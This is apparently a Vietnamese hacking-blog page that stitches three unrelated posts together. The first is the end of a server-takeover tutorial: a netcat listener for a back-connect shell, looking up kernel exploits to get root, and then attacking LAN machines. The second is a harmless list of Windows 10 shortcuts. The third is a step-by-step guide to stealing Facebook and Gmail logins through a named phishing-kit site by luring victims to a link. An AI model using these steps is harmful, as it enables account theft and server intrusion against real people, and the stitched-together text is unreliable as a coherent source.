Nếu là server linux thì nên thử Get root nó. Đôi khi thử rooting server lại là con đường ngắn hơn cả local sang. Không phải khi nào cũng local được. Nó bảo mật bá đạo quá thì cũng chịu chết thôi.Hãy thử rooting nếu được.

Tạo một backconnect hoặc có thể bind một port nào đó. Một back connect ở đây là server có thể tự connect về mình sau khi mình mở một port đặng biệt nào đó và lắng nghe nó bằng netcat ( nc -l -v -p 4444 ) chẳng hạn.Có khá nhiều shell hỗ trợ back-connect..

Muốn rooting thì phải kiểm tra xem kernel đó có rooting được hay không. Trên shell bạn có thể kiểm tra bằng lện "uname -a". Lấy phiên bản của kernel nhân được. Tìm trên google xem nó thể exploit đc hay không.
(Có thể vào exploit-db.com/local/ ) để tìm.

Bước 6: Attack Mạng Lan


Nếu bạn đã chiếm đc 1 server máy chủ rồi. Thì hãy cố gắng thử tấn công các máy cùng mạng Lan với nó. Đây là cơ hội để thể hiện khả năng attack trong mạng Lan của bạn.

AnonyViet Chúc Các Bạn Thành Công


Nguồn: quylevhb.blogsqot.com

Sunday, January 15, 2017

Tổng hợp phím tắt Logo Windows mà bất cứ IT nào cũng cần biết

Tổ hợp phím phím các máy tính sử dụng Windows 10 cho phép chúng ta thao tác nhanh và tiện. Hôm nay, AnonyViet xin liệt kê tất tần tật các tổ hợp phím Logo Windows rất thông dụng này.


Cũng như các bản hệ điều hành trước đây, Windows 10 được “ông lớn” Microsoft cung cấp cho các bộ tổ hợp phím rất thông dụng. Và phổ biến nhất có lẽ là tổ hợp phím sử dụng phím Windows hay còn được gọi là phím Start Menu.

 

Tất tần tật tổ hợp phím sử dụng phím Logo Windows

 

Sau đây là danh sách tất cả tổ hợp phím sử dụng phím Windows:

- Phím Windows : Mở hoặc đóng menu Start.

- Phím Windows + A: Mở Trung tâm hành động (Action center).

- Phím Windows + B: Đặt tiêu điểm ở khu vực thông báo.

- Phím Windows + C: Mở Cortana ở chế độ nghe. Lưu ý Cortana chỉ khả dụng tại một số quốc gia/khu vực và một số tính năng của Cortana có thể không khả dụng ở mọi nơi. Nếu Cortana không khả dụng hoặc nếu bạn đã tắt tính năng này, bạn vẫn có thể sử dụng tính năng tìm kiếm.

- Phím Windows + D: Hiển thị và ẩn màn hình nền.

- Phím Windows + E: Mở File Explorer.

- Phím Windows + G: Mở thanh Trò chơi khi một trò chơi đang mở.

- Phím Windows + H: Mở nút Chia sẻ.

- Phím Windows + I: Mở Cài đặt Settings.

- Phím Windows + K: Mở tác vụ nhanh Connect.

- Phím Windows + L: Khóa PC của bạn hoặc chuyển đổi tài khoản.

- Phím Windows + M: Thu nhỏ tất cả cửa sổ.

- Phím Windows + O: Khóa hướng thiết bị.

- Phím Windows + P: Chọn chế độ hiển thị bản trình bày.

- Phím Windows + R : Mở hộp thoại Run. Đây có thể coi là tổ hợp phím sử dụng phím Windows thường dùng nhất trong danh sách này.

 

Tất tần tật tổ hợp phím sử dụng phím Logo Windows

 

- Phím Windows + S: Mở tìm kiếm.

- Phím Windows + T: Quay vòng qua các ứng dụng trên thanh tác vụ.

- Phím Windows + U: Mở Trung tâm Trợ năng.

- Phím Windows + V: Quay vòng qua các thông báo.

- Phím Windows + Shift + V: Quay vòng qua các thông báo theo thứ tự ngược lại

- Phím Windows + X: Mở menu Liên kết Nhanh.

- Phím Windows + Z: Hiển thị các lệnh có sẵn trong một ứng dụng ở chế độ toàn màn hình.

- Phím Windows + dấu phẩy (,): Tạm thời xem màn hình nền.

- Phím Windows + Pause: Hiển thị hộp thoại Thuộc tính Hệ thống.

- Phím Windows + Ctrl + F: Tìm kiếm PC (nếu bạn đang sử dụng một mạng).

- Phím Windows + Shift + M: Khôi phục các cửa sổ thu nhỏ trên màn hình nền.

- Phím Windows + số: Mở màn hình nền và khởi động ứng dụng được ghim vào thanh tác vụ tại vị trí được chỉ ra theo số. Nếu ứng dụng đang chạy, chuyển sang ứng dụng đó.

- Phím Windows + Shift + số: Mở màn hình nền và khởi động phiên bản mới của ứng dụng được ghim vào thanh tác vụ tại vị trí được chỉ ra theo số.

- Phím Windows + Ctrl + số: Mở màn hình nền và chuyển sang cửa sổ cuối đang hoạt động của ứng dụng được ghim vào thanh tác vụ tại vị trí được chỉ ra theo số.

- Phím Windows + Alt + số: Mở màn hình nền và mở Danh sách Nhảy cho ứng dụng được ghim vào thanh tác vụ tại vị trí được chỉ ra theo số.

- Phím Windows + Ctrl + Shift + số: Mở màn hình nền và mở phiên bản mới của ứng dụng tại vị trí đã cho trên thanh tác vụ với tư cách quản trị viên.

- Phím Windows + Tab: Mở chế độ xem Tác vụ .

- Phím Windows + Mũi tên lên: Phóng to cửa sổ.

 

Tất tần tật tổ hợp phím sử dụng phím Logo Windows

 

- Phím Windows + Mũi tên xuống: Loại bỏ ứng dụng hiện tại khỏi màn hình hoặc thu nhỏ cửa sổ màn hình nền.

- Phím Windows + Mũi tên trái: Phóng to cửa sổ màn hình nền hoặc ứng dụng về bên trái màn hình.

- Phím Windows + Mũi tên phải: Phóng to cửa sổ màn hình nền hoặc ứng dụng về bên phải màn hình.

- Phím Windows + Home: Thu nhỏ tất cả ngoại trừ cửa sổ màn hình nền đang hoạt động (khôi phục tất cả cửa sổ vào lần nhấn phím thứ hai).

- Phím Windows + Shift + Mũi tên lên: Kéo giãn cửa sổ màn hình nền về phía đầu và cuối màn hình.

- Phím Windows + Shift + Mũi tên xuống: Khôi phục/thu nhỏ các cửa sổ màn hình nền đang hoạt động theo chiều dọc, duy trì độ rộng.

- Phím Windows + Shift + Mũi tên trái hoặc Mũi tên phải: Di chuyển ứng dụng hoặc cửa sổ trong màn hình nền từ màn hình này đến màn hình khác.

- Phím Windows + Phím cách: Chuyển đổi ngôn ngữ nhập và bố cục bàn phím.

- Phím Windows + Ctrl + Phím cách: Thay đổi sang phương thức nhập đã chọn trước đó.

- Phím Windows + Enter: Mở Trình tường thuật.

- Phím Windows + sổ chéo (/): Tiến hành chuyển đổi lại IME.

- Phím Windows + dấu cộng (+) hoặc dấu trừ (-): Phóng to hoặc thu nhỏ bằng Kính lúp.

- Phím Windows + Esc: Thoát Kính lúp.

Trên đây là tất cả tổ hợp phím sử dụng phím Windows thông dụng nhất trên máy tính Windows 10. Hy vọng bài viết sẽ có ích cho bạn.

Tác giả: blogthuthuatwin10.com



Hướng dẫn Phishing Facebook, Gmail không cần Host và lập trình

Nhìn cái tiêu đề là thấy hấp dẫn rồi phải không, hiện nay một số bạn muốn tạo Web Phishing nhưng việc tìm Host để up file Phishing lên rất khó, hầu như các nhà cung cấp dịch vụ họ cài chức năng chống Phishing lên Host rồi, trừ khi bạn mua Host có phí thôi.

Nắm bắt tình hình này, hôm nay AnonyViet sẽ hướng dẫn các bạn tự tạo 1 trang Web Phishing rất đơn giản, không cần Host, không cần Domain, Không cần biết lập trình, chỉ cần tạo 1 account rồi get link ra gửi cho Victim thôi

Các bài viết liên quan:

Hướng dẫn tạo Web Phishing Facebook

Bước 1: Vào Website dưới đây đăng ký 1 tài khoản

[su_button url="http://smikta.net/index.php" target="blank" style="stroked" size="7" center="yes" radius="round" text_shadow="px px px "]Tạo Web Phishing[/su_button]



Bước 2: Sau khi đăng ký xong nhìn cột bên trái sẽ có ô Đăng nhập



Bước 3: Ra lại trang chủ bạn sẽ được liệt kê các dịch vụ tạo trang Web Phishing miễn phí, ở đây ta thấy sẽ có nhiều nhà cung cấp như: Facebook, Yahoo, Gmail, Skype

Nếu muốn Phishing Facebook thì chọn dòng số 31, Gmail thì số 3, Skype thì Số 7...

Chọn một dịch vụ muốn Phishing rồi nhấn vào lá cờ nước Anh bên cạnh



Bước 4: , bạn sẽ được trang Web cung cấp cho một đường Link, chỉ cần gửi Link này cho nạn nhân và dụ dỗ họ nhấn vào đăng nhập là bạn sẽ có được tài khoản của họ



Bước 5: Sau khi dụ dỗ được nạn nhân đăng nhập, vào lại trang Web ban đầu, click chọn Menu My Victime để xem thành quả nhé